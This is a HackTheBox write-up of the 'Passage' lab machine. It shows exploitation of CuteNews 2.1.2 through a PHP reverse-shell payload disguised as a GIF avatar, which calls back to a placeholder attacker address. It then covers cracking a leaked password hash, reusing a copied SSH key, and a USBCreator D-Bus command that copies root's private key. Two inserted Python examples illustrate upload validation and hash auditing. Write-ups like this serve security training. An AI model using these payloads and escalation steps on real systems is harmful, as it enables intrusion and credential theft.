HackTheBox - Passage Writeup
Introduction
Passage is a medium-difficulty machine, and enumeration is the key to this box. First we exploit the CuteNews web application to get an initial reverse shell. After that I found a bunch of PHP files containing user information in base64 format, which gave me the hash for the user paul; cracking that hash let me log in as paul. The users paul and nadav share SSH keys, so I copied the SSH key and got access to the user nadav. I then found that nadav is in the sudo group, and the .viminfo file revealed useful information for getting root. To root this machine I used the USBCreator D-Bus privilege escalation.
Skills Required : Enumeration, basic Linux commands
Skills Learned : Web exploitation, USBCreator D-Bus privilege escalation
Enumeration
Nmap scan
The nmap scan shows that two ports are open:
22 ssh
80 http
#nmap -sV -sC -oN scan-tcp.nmap 10.10.10.206
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 17:32 GMT
Nmap scan report for 10.10.10.206
Host is up (0.040s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.31 seconds
So the machine runs the Apache web server. I opened the web page in my browser.
CuteNews
The web page shows the host name and gives me two email addresses:
admin : nadav@passage.htb
Paul Coles : paul@passage.htb
I added passage.htb to my /etc/hosts file.
The page also reveals that the website is powered by CuteNews. After searching on the internet I found that CuteNews is a news management system that uses flat files as its storage.
I then searched the internet for any available exploit for CuteNews, and when I looked at the page source I found some interesting information:
# Source Page Code
<link href="CuteNews/libs/css/cosmo.min.css" rel="stylesheet">
<link href="CuteNews/libs/css/font-awesome.min.css" rel="stylesheet">
After that I went to the CuteNews directory and found the CuteNews login page.
The login page shows that the CuteNews version is 2.1.2.
CuteNews 2.1.2 - Remote Code Execution
So I checked for exploits in Exploit-DB using the searchsploit command:
user@home:~$ searchsploit cutenews 2.1.2
#searchsploit cutenews 2.1.2
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt
CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt
CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
user@home:~$ searchsploit -m php/webapps/48800.py
You can run that script if you want, but I chose to exploit CuteNews manually.
It is a simple three-step process:
- Create a user via the register form
- Then click on Personal options
- Scroll down until you see the avatar upload, and upload shell.php
user@home:~$ vim shell.php
GIF8;
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOURIP/1234 0>&1'") ?>
Save the file and upload it.
Before opening the avatar image, start a listener on port 1234 with the nc command:
user@home:~$ nc -lvvnkp 1234
Then open the avatar image in the browser, and I got the shell!
#nc -lvvnkp 1234
listening on [any] 1234 ...
connect to [10.10.14.xx] from (UNKNOWN) [10.10.10.206] 37080
bash: cannot set terminal process group (1635): Inappropriate ioctl for device
bash: no job control in this shell
www-data@passage:/var/www/html/CuteNews/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@passage:/var/www/html/CuteNews/uploads$
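As an added illustration (not code from this page or from CuteNews), the Python below contrasts a prefix-only image check, which the GIF8; trick above satisfies, with a check that requires the complete signature for an allow-listed extension and lets the server choose the stored name. The inputs are constructed for the example.

```python
import os
import secrets

# Constructed inputs for this example (not files from the target): an upload in the
# style of the avatar trick above (image-looking prefix, then PHP) and a real GIF header.
FAKE_AVATAR = ("shell.php", b"GIF8;\n<?php /* placeholder body */ ?>")
REAL_GIF = ("me.gif", b"GIF89a" + bytes(20))

# Full signatures per allow-listed extension; "GIF8" alone is only a fragment of these.
SIGNATURES = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
}

def weak_check(data: bytes) -> bool:
    """Prefix-only validation: anything that merely starts like an image passes."""
    return data.startswith((b"GIF8", b"\x89PNG", b"\xff\xd8\xff"))

def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Require an allow-listed extension AND the complete signature for that type."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in SIGNATURES:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(SIGNATURES[ext]):
        return False, f"content does not carry a full {ext} signature"
    return True, "ok"

def stored_name(filename: str) -> str:
    """Server-chosen file name: random stem plus the validated extension, so the
    client never controls the name under which the upload is written."""
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()

def triage(filename: str, data: bytes) -> dict:
    """Run both checks on one upload; handy when reviewing an upload handler."""
    ok, reason = hardened_check(filename, data)
    return {"weak_accepts": weak_check(data), "hardened_accepts": ok, "reason": reason}

if __name__ == "__main__":
    for name, blob in (FAKE_AVATAR, REAL_GIF):
        print(name, triage(name, blob))
```

The other half of the fix is server configuration: the upload directory must never be handed to the PHP handler, because a genuine image can still carry PHP text in its body.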
Getting User Paul
After some enumeration I found the directory that contains the user information, with the password hashes stored in base64 format.
www-data@passage:/var/www/html/CuteNews/cdata/users$ ls
ls
01.php
09.php
0a.php
16.php
21.php
2a.php
32.php
52.php
5d.php
62.php
66.php
6e.php
77.php
7a.php
81.php
8f.php
97.php
a5.php
b0.php
b1.php
c8.php
d2.php
d4.php
d5.php
d6.php
e0.php
f3.php
fc.php
lines
users.txt
cat 09.php
www-data@passage:/var/www/html/CuteNews/cdata/users$ cat 09.php
cat 09.php
<?php die('Direct call - access denied'); ?>
YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319
Decode the base64:
echo base64_text | base64 -d
www-data@passage:/var/www/html/CuteNews/cdata/users$ echo "YToxOntzOjU6ImVtYWlsIjthOjE6e3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6MTA6InBhdWwtY29sZXMiO319" | base64 -d
a:1:{s:5:"email";a:1:{s:16:"paul@passage.htb";s:10:"paul-coles";}}
So I decided to decode all the files. The base64 strings here all start with "Y" (base64 of the "a:" prefix of a PHP serialized array), so I used the command:
www-data@passage:/var/www/html/CuteNews/cdata/users$ grep -rh Y | base64 -d
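As an added example (my own code, not from this page or from CuteNews), the following Python decodes a record in the layout of these cdata/users files, parses the PHP serialize() format, and flags any field stored as a bare 64-hex digest, which is how an auditor of such an install would spot unsalted fast hashes before an attacker does. The sample record is constructed.

```python
import base64
import hashlib
import re

def php_unserialize(buf: bytes, pos: int = 0):
    """Minimal parser for the PHP serialize() subset seen here: N, i, b, d, s, a."""
    tag = buf[pos:pos + 1]
    if tag == b"N":
        return None, pos + 2
    if tag in (b"i", b"b", b"d"):          # i:<int>;  b:<0|1>;  d:<float>;
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end]
        conv = {b"i": int, b"d": float, b"b": lambda r: r == b"1"}[tag]
        return conv(raw), end + 1
    if tag == b"s":                        # s:<bytelen>:"<bytes>";
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2
        return buf[start:start + length].decode("utf-8", "replace"), start + length + 2
    if tag == b"a":                        # a:<count>:{<key><value>...}
        colon = buf.index(b":", pos + 2)
        count, pos, out = int(buf[pos + 2:colon]), colon + 2, {}
        for _ in range(count):
            key, pos = php_unserialize(buf, pos)
            out[key], pos = php_unserialize(buf, pos)
        return out, pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def decode_user_file(text: str):
    """Drop the PHP guard line, base64-decode the remainder and unserialize it."""
    payload = "".join(l for l in text.splitlines() if not l.lstrip().startswith("<?php"))
    return php_unserialize(base64.b64decode(payload.strip()))[0]

HEX64 = re.compile(r"^[0-9a-f]{64}$")
def audit_unsalted_hashes(record, path=()):
    """Paths of every value that is a bare 64-hex digest (an unsalted SHA-256-style hash)."""
    found = []
    if isinstance(record, dict):
        for key, value in record.items():
            found.extend(audit_unsalted_hashes(value, path + (key,)))
    elif isinstance(record, str) and HEX64.match(record):
        found.append(path)
    return found

# Constructed sample in the layout of a cdata/users/*.php file; account data and password are invented.
SAMPLE_USER_FILE = "<?php die('Direct call - access denied'); ?>\n" + base64.b64encode(
    b'a:1:{s:4:"name";a:1:{s:4:"paul";a:3:{s:4:"name";s:4:"paul";'
    b's:5:"email";s:16:"paul@passage.htb";s:4:"pass";s:64:"'
    + hashlib.sha256(b"example-only").hexdigest().encode() + b'";}}}'
).decode()
```

Running decode_user_file(SAMPLE_USER_FILE) and passing the result to audit_unsalted_hashes returns [("name", "paul", "pass")], the one field that needs migrating to a salted, slow password hash.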
I got the hash for user paul. Let's crack the hash with john:
user@home:~$ echo 'e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd' > hash
user@home:~$ john hash --wordlist=/opt/rockyou.txt --format=Raw-SHA256
#john hash --wordlist=/opt/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 128/128 AVX 4x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
atlanXXX (?)
1g 0:00:00:00 DONE (2021-03-18 18:52) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..cocoliso
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed
Change the user to paul:
python3 -c "import pty;pty.spawn('/bin/bash')"
su paul
www-data@passage:/var/www/html/CuteNews/cdata/users$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
su paul
Password:
paul@passage:/var/www/html/CuteNews/cdata/users$
The user flag is at /home/paul/user.txt:
paul@passage:~$ pwd
pwd
/home/paul
paul@passage:~$ wc user.txt
wc user.txt
1 1 33 user.txt
Privilege Escalation
After some enumeration I found something interesting: there is only one entry in authorized_keys.
paul@passage:~/.ssh$ cat authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
Getting User nadav
So I assumed it was possible that the users paul and nadav share SSH keys, and I copied paul's id_rsa file.
I saved it on my machine as nadav.key, set the permissions and logged in. It worked: I got the user nadav.
user@home:~$ chmod 600 nadav.key
user@home:~$ ssh -i nadav.key nadav@passage.htb
Last login: Mon Aug 31 15:07:54 2020 from 127.0.0.1
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
nadav@passage:~$
Getting Root
After some enumeration I found some interesting information in the .viminfo file: the vim history indicates that there have been changes to the files /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf and /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf.
nadav@passage:~$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<!DOCTYPE busconfig PUBLIC
"-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
"http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>
<!-- Only root can own the service -->
<policy user="root">
<allow own="com.ubuntu.USBCreator"/>
</policy>
<!-- Allow anyone to invoke methods (further constrained by
PolicyKit privileges -->
<policy context="default">
<allow send_destination="com.ubuntu.USBCreator"
send_interface="com.ubuntu.USBCreator"/>
<allow send_destination="com.ubuntu.USBCreator"
send_interface="org.freedesktop.DBus.Introspectable"/>
<allow send_destination="com.ubuntu.USBCreator"
send_interface="org.freedesktop.DBus.Properties"/>
</policy>
</busconfig>
nadav@passage:~$ cat /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
nadav@passage:~$
So I copied the file name and googled it. What I understood is that a user in the sudo group can use this for privilege escalation, and nadav is in the sudo group, so I tried it. I used the following command to copy the root user's SSH key to /home/nadav/key:
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /home/nadav/key true
nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /home/nadav/key true
()
I copied the key file to my machine, saved it as root.key and set the permissions:
user@home:~$ chmod 600 root.key
So let's log in as root.... BOOM
user@home:~$ ssh -i root.key root@passage.htb
#ssh -i root.key root@passage.htb
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# id
uid=0(root) gid=0(root) groups=0(root)
root@passage:~# wc root.txt
1 1 33 root.txt
root@passage:~#